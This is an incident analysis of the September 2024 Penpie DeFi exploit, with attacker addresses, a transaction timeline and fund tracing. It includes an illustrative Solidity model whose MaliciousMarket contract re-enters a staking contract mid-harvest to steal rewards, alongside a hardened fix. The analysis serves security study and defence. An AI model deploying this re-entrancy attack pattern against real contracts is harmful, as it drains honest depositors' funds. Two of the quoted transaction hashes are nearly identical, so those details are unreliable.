
The Penpie Heist

On September 3rd, 2024, Penpie, a yield farming protocol built on the Pendle Finance ecosystem, suffered a major exploit that led to the loss of approximately $27 million in crypto assets. The attacker registered a fake market on Pendle Finance, backed by malicious contracts posing as SY (Standardized Yield) tokens and linked to Pendle Liquidity Provider Tokens (LPT). Through that market the attacker inflated the rewards Penpie paid out and redeemed them for a range of assets, including staked ETH (stETH), agETH, rswETH, sUSDE and gUSDC.

Penpie’s Role in Pendle Finance

Penpie plays a pivotal role within the Pendle Finance ecosystem by offering yield optimization and boosting services using veTokenomics (Voting Escrow Tokenomics). Through Penpie, users can lock PENDLE tokens, gain governance rights, and maximize both their rewards and governance participation. These functionalities are critical in enhancing the overall utility and growth of Pendle Finance.

Attack Overview and Initial Response

Following the exploit, both Penpie and Pendle Finance promptly halted their operations to limit further damage. Despite these measures, the exploit significantly impacted the tokens associated with both protocols. Penpie’s native token (PNP) saw a dramatic 40% drop in value, while PENDLE itself experienced a 9% decline. This rapid devaluation highlights the far-reaching consequences of security vulnerabilities in decentralized finance (DeFi) ecosystems.

SY - Standardized Yield tokens: contracts that wrap any yield-bearing token.

PT - Principal Tokens: represent the principal, redeemable at a future maturity date.

YT - Yield Tokens: represent the future yield of the underlying.

LPT - Liquidity Provider Tokens: a certificate of having provided liquidity to a Pendle market.

PRT - Pool Reward Tokens: the certificate received after depositing LPT into a Penpie pool.

Addresses and Transactions

  • Main Attacker Address: 0x7a2f4d625fb21f5e51562ce8dc2e722e12a61d1b

  • Malicious SY Contracts:

    1. 0x4af4c234b8cb6e060797e87afb724cfb1d320bb7

    2. 0x4476b6ca46b28182944ed750e74e2bb1752f87ae

    3. 0xcde2cd6aeaaf0238f4ce33295be13704e4a97de2

    4. 0x4BC9815b859c8172CEe1ab2CD372fD0Eb00eb487

  • Key Exploit Transactions:

  1. 0x42b2ec27c732100dd9037c76da415e10329ea41598de453bb0c0c9ea7ce0d8e5 (Ethereum)

  2. 0x7e7f9548f301d3dd863eac94e6190cb742ab6aa9d7730549ff743bf84cbd21d1 (Ethereum)

  3. 0x56e09abb35ff12271fdb38ff8a23e4d4a7396844426a94c4d3af2e8b7a0a2813 (Ethereum)

  4. 0x67c5400da117b906f8c0fc5f5149e4ea10ed6358cd9ea2ec0ed8f559d757b7df (Arbitrum)

Decoding the Exploit

The root cause of the exploit was Penpie’s flawed assumption that every market created on Pendle was legitimate. The attacker deployed three malicious SY contracts on Ethereum (and a fourth on Arbitrum) and used them to mint counterfeit tokens, including PT-stETH 26DEC2024 (Principal Tokens) and YT-stETH 26DEC2024 (Yield Tokens). By staking these counterfeit tokens, the attacker obtained Liquidity Provider Tokens (LPT), which were then deposited into Penpie’s pool to receive Pool Reward Tokens (PRT).

The attacker then targeted the batchHarvestMarketRewards() function of the Pendle Staking contract. Using flash loans from Balancer (a DeFi protocol), in particular of sUSDE, wstETH, agETH and rswETH, they injected a large amount of liquidity into the fake market. Harvesting that market invoked the redeemRewards() function of the malicious SY contract, which temporarily inflated the attacker’s staked balance at the moment rewards were computed. As a result, they could claim disproportionately large rewards.

A key weakness exploited in this attack was the absence of a reentrancy guard. Because the harvest made an external call into the attacker-controlled SY contract, the attacker could call back into the reward logic repeatedly within the same transaction, and since they were the sole depositor in the fake market, every reward credited went to them. This let them harvest rewards continuously and accumulate assets they were never entitled to.

Once the rewards were claimed, the attacker burned the PRT tokens, withdrew all liquidity, redeemed the rewards and repaid the flash loans. Repeating this four times in total, they walked away with nearly $27 million. Notably, the exploit was carried out not only on Ethereum but on Arbitrum as well.

This attack underscores the critical need for market validation, reentrancy protections, and improved reward distribution mechanisms in DeFi protocols.
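The Solidity below is an added illustrative model written for this write-up; it is not Penpie’s, Pendle’s or the attacker’s code and does not reproduce the real contracts’ interfaces. It models the three properties described above: the staking contract accepts any address as a market, its harvest makes an unguarded external call into that market’s redeemRewards(), and the attacker is the sole depositor of the fake market. One assumption is added that the page does not state: that the harvester measures a market’s reward as the change in its own token balance across that external call (a common harvester pattern), which is what turns a re-entrant deposit of flash-loaned LP tokens into booked “reward”. All names (VulnerableStaking, HardenedStaking, MaliciousMarket, LegitMarket, LPToken, claim, withdrawLoan) are the model’s own.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Token stub for this model only: no allowances, anyone can mint.
contract LPToken {
    mapping(address => uint256) public balanceOf;
    function mint(address to, uint256 amt) external { balanceOf[to] += amt; }
    function transferFrom(address from, address to, uint256 amt) external returns (bool) { balanceOf[from] -= amt; balanceOf[to] += amt; return true; }
}

// What the staking contract assumes every market it is handed provides.
interface IMarket {
    function lpToken() external view returns (LPToken);
    function rewardToken() external view returns (LPToken);
    function redeemRewards(address user) external;
}

contract VulnerableStaking {
    mapping(address => mapping(address => uint256)) public staked;     // market => user => LP staked
    mapping(address => uint256) public totalStaked;                    // market => LP staked
    mapping(address => uint256) public accPerShare;                    // market => reward per LP, 1e18-scaled
    mapping(address => mapping(address => uint256)) public rewardDebt; // MasterChef-style reward debt
    mapping(address => mapping(address => uint256)) public claimable;  // market => user => reward owed

    // Credit rewards accrued since the last debt reset, then pin the debt to the current accumulator.
    function _checkpoint(address m, address u) internal { claimable[m][u] += staked[m][u] * accPerShare[m] / 1e18 - rewardDebt[m][u]; }
    function _resetDebt(address m, address u) internal { rewardDebt[m][u] = staked[m][u] * accPerShare[m] / 1e18; }

    function depositMarket(address m, uint256 amount) public virtual {
        _checkpoint(m, msg.sender);
        IMarket(m).lpToken().transferFrom(msg.sender, address(this), amount);
        staked[m][msg.sender] += amount;
        totalStaked[m] += amount;
        _resetDebt(m, msg.sender);
    }
    function withdrawMarket(address m, uint256 amount) public virtual {
        _checkpoint(m, msg.sender);
        staked[m][msg.sender] -= amount;
        totalStaked[m] -= amount;
        _resetDebt(m, msg.sender);
        IMarket(m).lpToken().transferFrom(address(this), msg.sender, amount);
    }
    function claim(address m) public virtual {
        _checkpoint(m, msg.sender);
        _resetDebt(m, msg.sender);
        uint256 amt = claimable[m][msg.sender];
        claimable[m][msg.sender] = 0;
        IMarket(m).rewardToken().transferFrom(address(this), msg.sender, amt);
    }
    // Weakness 1: any address is accepted as a market; nothing checks it came from the Pendle factory.
    // Weakness 2: no reentrancy guard, so the market's redeemRewards() can call back into depositMarket().
    // Weakness 3 (assumed accounting): reward = balance delta across that untrusted call, so LP tokens
    //   deposited re-entrantly into ANY market are booked as THIS market's reward.
    function batchHarvestMarketRewards(address[] calldata markets) public virtual {
        for (uint256 i = 0; i < markets.length; i++) {
            address m = markets[i];
            LPToken token = IMarket(m).rewardToken();
            uint256 before = token.balanceOf(address(this));
            IMarket(m).redeemRewards(address(this));
            uint256 delta = token.balanceOf(address(this)) - before;
            if (delta > 0 && totalStaked[m] > 0) accPerShare[m] += delta * 1e18 / totalStaked[m];
        }
    }
}

// Hardened variant: allowlist of markets (populated from the Pendle market factory) plus a reentrancy lock.
contract HardenedStaking is VulnerableStaking {
    mapping(address => bool) public isValidMarket;
    uint256 private lock = 1;
    modifier nonReentrant() { require(lock == 1, "reentrant"); lock = 2; _; lock = 1; }
    modifier onlyMarket(address m) { require(isValidMarket[m], "unknown market"); _; }
    constructor(address[] memory ms) { for (uint256 i = 0; i < ms.length; i++) isValidMarket[ms[i]] = true; }
    function depositMarket(address m, uint256 a) public override nonReentrant onlyMarket(m) { super.depositMarket(m, a); }
    function withdrawMarket(address m, uint256 a) public override nonReentrant onlyMarket(m) { super.withdrawMarket(m, a); }
    function claim(address m) public override nonReentrant onlyMarket(m) { super.claim(m); }
    function batchHarvestMarketRewards(address[] calldata ms) public override nonReentrant {
        for (uint256 i = 0; i < ms.length; i++) require(isValidMarket[ms[i]], "unknown market");
        super.batchHarvestMarketRewards(ms);
    }
}

contract LegitMarket is IMarket {
    LPToken public immutable override lpToken;
    LPToken public immutable override rewardToken;
    constructor(LPToken lp, LPToken rt) { lpToken = lp; rewardToken = rt; }
    function redeemRewards(address) external override {}
}

// Attacker-controlled "SY market": its stake token is worthless and held only by the attacker, its
// reward token is the REAL LP token of a legitimate market, and it re-enters the staker mid-harvest.
contract MaliciousMarket is IMarket {
    LPToken public immutable override lpToken;
    LPToken public immutable override rewardToken;
    VulnerableStaking immutable staking;
    address immutable legit;
    constructor(LPToken fake, LPToken real, VulnerableStaking s, address legitMarket) { lpToken = fake; rewardToken = real; staking = s; legit = legitMarket; }
    function redeemRewards(address) external override {
        // Flash-loaned REAL LP (simply minted to this contract in the model) goes into the legitimate
        // market while the harvester is mid-call, so the harvester's balance delta becomes "reward".
        staking.depositMarket(legit, rewardToken.balanceOf(address(this)));
    }
    function withdrawLoan(address to) external {  // called after the attacker has claimed the "reward"
        staking.withdrawMarket(legit, staking.staked(legit, address(this)));
        rewardToken.transferFrom(address(this), to, rewardToken.balanceOf(address(this)));
    }
}
```

Sequence against VulnerableStaking, mirroring the timeline below: honest users hold REAL LP staked in LegitMarket; the attacker mints 1 FAKE, calls depositMarket(MaliciousMarket, 1) and is its only staker; the flash loan is modelled by minting `loan` REAL to MaliciousMarket; the attacker calls batchHarvestMarketRewards([MaliciousMarket]), whose redeemRewards() re-enters depositMarket(LegitMarket, loan), so the harvester books `loan` as the fake market’s reward and credits all of it to the attacker; claim(MaliciousMarket) pays `loan` REAL to the attacker, and withdrawLoan() then pulls the same `loan` back out of LegitMarket. The staking contract ends `loan` short in REAL, taken from the legitimate market’s honest depositors, and the attacker repays the flash loan from the doubled balance. Against HardenedStaking the first depositMarket on the unlisted fake market reverts with "unknown market", and even if an operator wrongly allowlisted it, the re-entrant deposit inside the harvest reverts with "reentrant", so neither layer alone has to be perfect.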

Hack Breakdown and Timeline

1. Creation of Malicious Contracts and Tokens at 1:41 PM on 3rd September, 2024

At 1:41 PM on September 3rd, the attacker deployed the first malicious SY contract and used it to mint fake PT and YT tokens backed by no real asset. (Tx-0xfda0dde38fa4c5b0e13c506782527a039d3a87f93f9208c104ee569a642172cd2)

Creation of first Malicious Contract
Attack contract as SY contract with PT and YT tokens

2. Creation of Fake Pendle Market at 1:44 PM on 3rd September

By 1:44 PM, the attacker had used the malicious tokens to create a fake market on Pendle, which Penpie accepted as legitimate. This gave them a market in which they were the only liquidity provider and whose reward accounting they could manipulate. (Tx-0xfda0dde38fa4c5b0e13c506782527a039d3a87f93f9208c104ee569a642172d2)

Creation of Fake Market

3. First Attack Execution at 2:23 PM on 3rd September

The attacker used a second address, Attacker 2 (0xc0eb7e6e2b94aa43bdd0c60e645fe915d5c6eb84), and took flash loans from Balancer to inflate liquidity with assets such as wstETH, sUSDE, agETH and rswETH.

Flash Loan from Balancer

With that liquidity in hand, the attacker called batchHarvestMarketRewards(), which in turn invoked the redeemRewards() function of the malicious SY contract. This let them harvest rewards multiple times despite having provided no real liquidity.

The Attack

After removing all the liquidity, withdrawing the rewards and repaying the flash loans, the exploiter transferred the proceeds from the attack contract to Attacker 1 at 2:27 PM (Tx-0x5f348e5d7802bdfcb5e3b7515d8d0a50c6a1067cf2fe6633334abce4bc2ee8f0).

Transfer of rewards

4. Creation of another Malicious SY Contract at 2:31 PM on 3rd September

The attacker then repeated the same strategy against Penpie, deploying a new malicious SY contract.

Creation of a new malicious SY Contract

One important point: all of the fake tokens were created through the PendleYieldContractFactory contract, and all of the fake markets through the PendleMarketFactoryV3 contract. This is where Penpie’s flawed assumption bit: anything deployed through those factories was treated as a legitimate market.

The purpose of minting fake YT and PT tokens was to obtain the valuable LP and PRT tokens, which serve as proof of providing liquidity, and then to inflate the rewards paid against them.

YT and PRT tokens

5. The Second Attack at 2:37 PM on 3rd September

Holding the PRT and YT tokens, the attacker returned to the Balancer Vault and borrowed large amounts of agETH and rswETH through flash loans.

Second Flash Loan from Balancer

They then exploited the pool’s batchHarvestMarketRewards() function again, triggering the redeemRewards() function of the new fake market (0x5b6c...), which set the rewards to the two new market tokens. After depositing those into the Penpie pool, they called the multiclaim() function of the MasterPenpie contract as the only depositor.

The Second Attack

This let them withdraw the LPT tokens. Finally, the attacker burned the PRT tokens, withdrew all rewards and liquidity, repaid the flash loans and kept the difference as profit.

Rewards

6. Creation of Another Malicious SY contract at 2:38 PM on 3rd September

The attacker executed the same strategy a third time in the same fashion, gaining more agETH and rswETH.

Third Attack

Tracing the Funds

Using Blockscope’s Tracer tool, we identified the paths taken by the attacker to obscure the stolen funds. The image below shows the transfer of funds to the Attacker from various Malicious contracts.

Attacker and Malicious SY contracts

The majority of assets were funneled through Tornado Cash, making further tracking difficult. The visualization tool clearly highlights the Rubic Offset Router being used to swap rewards and various intermediary addresses that facilitated fund tunneling.

Tunneling of Funds

Associated Addresses

Let’s look at the major addresses involved in this Penpie exploit. We found many more addresses and wallets, but list only those that are relevant. Using our Cohort Analysis, we have visualized the major wallets and contracts involved in this exploit.

Cohort Analysis

List of all the Associated Addresses

| Identity | Detail | Address |
| --- | --- | --- |
| Main Attacker | The main attacker wallet of the exploit | 0x7a2f4d625fb21f5e51562ce8dc2e722e12a61d1b |
| Attacker 2 | Wallet used to transfer funds in the first SY contract exploit | 0xc0eb7e6e2b94aa43bdd0c60e645fe915d5c6eb84 |
| Attacker 3 | Used for tunneling and off-boarding funds | 0x28e3fd9edca8fccb912fe3ab36c78f96cfc74769 |
| Attacker 4 | Used for tunneling and off-boarding funds | 0x69751b7e52dbbd64281ec9049dfa623c7ecdeb52 |
| Attacker 5 | Used for tunneling and off-boarding funds | 0x2f2dde668e5426463e05d795f5297db334f61c39 |
| Attacker 6 | Used for tunneling and off-boarding funds | 0x2dc15e0ff02f39d4d23a96d6ef2595df3d1e18a0 |
| Attacker 7 | Used for tunneling and off-boarding funds | 0x415a7916c0f52a95f16034d74fb89528c0fc1b11 |
| Attacker 8 | Used for tunneling and off-boarding funds | 0x8c37ad70ce51e54d2d75da40668e9530d337f26b |
| Attacker 9 | Used for tunneling and off-boarding funds | 0x688413d6cae1c0e0882e274a98e0b901fdf7233c |
| Attacker 10 | Used for tunneling and off-boarding funds | 0xf61aa5fdb43ecbb90ff12086045c9432eee3d03e |
| Attacker 11 | Used for tunneling and off-boarding funds | 0x10f8c81386a2563f687011f4ebc8f2091cb501e8 |
| Attacker 12 | Used for tunneling and off-boarding funds | 0x37767e2d9131c84441567da5474158b0918b65a4 |
| Malicious SY Contract | Contract used in the first attack | 0x4af4c234b8cb6e060797e87afb724cfb1d320bb7 |
| Malicious SY Contract 2 | Contract used in the second attack | 0x4476b6ca46b28182944ed750e74e2bb1752f87ae |
| Malicious SY Contract 3 | Contract used in the third attack | 0xcde2cd6aeaaf0238f4ce33295be13704e4a97de2 |
| Malicious Contract on Arbitrum | Contract used in the attack on Arbitrum | 0x4BC9815b859c8172CEe1ab2CD372fD0Eb00eb487 |

Notable Observations

Cross-Chain Exploit: The attack was executed not only on Ethereum but also on Arbitrum, where the attacker leveraged flash loans in gUSDC and exploited the protocol similarly using another malicious contract (0x4bc9815b859c8172cee1ab2cd372fd0eb00eb487).

Attack on Arbitrum

Audited Protocols: Penpie and Pendle Finance had been audited by WatchPug and Zokyo, yet the audits did not catch the weaknesses that enabled this reentrancy attack. This highlights the need for ongoing audits and real-time monitoring rather than one-off reviews.

Messages to Attacker: Numerous messages were sent to the attacker post-exploit, including offers of assistance from bounty hunters and others who were attempting to capitalize on the situation.

Message from Victim
Anonymous Message

Monitoring

We’ve activated Blockscope’s Watchtower to continuously monitor transactions involving more than 12 addresses linked to the $27 Million Penpie Hack. Our public watchtower provides real-time surveillance, ensuring no suspicious movement goes unnoticed as we work to track and analyze the attacker's activities.

Conclusion

The $27 million Penpie exploit serves as a reminder of the vulnerabilities that persist in the DeFi ecosystem, despite audits and security checks. Strengthening market validation processes and implementing better safeguards like reentrancy guards and real-time monitoring systems are essential to prevent such devastating attacks in the future.

Investigation by: Tushar Tiwari, Analyst @ Blockscope

Disclaimer: Best Effort Investigation

This investigation and its findings represent our best effort based on the information available at the time. However, please be aware of the following limitations:

  • The data used in this investigation may contain inaccuracies, omissions, or errors.

  • Information sources may be incomplete or subject to change.

  • New evidence may emerge that could alter the conclusions.

  • Analysis and interpretations are based on current understanding and may evolve.

We have made every reasonable attempt to ensure accuracy, but cannot guarantee that all information is entirely correct or complete. This report should be considered a snapshot of our current knowledge and understanding, subject to revision as new information becomes available.
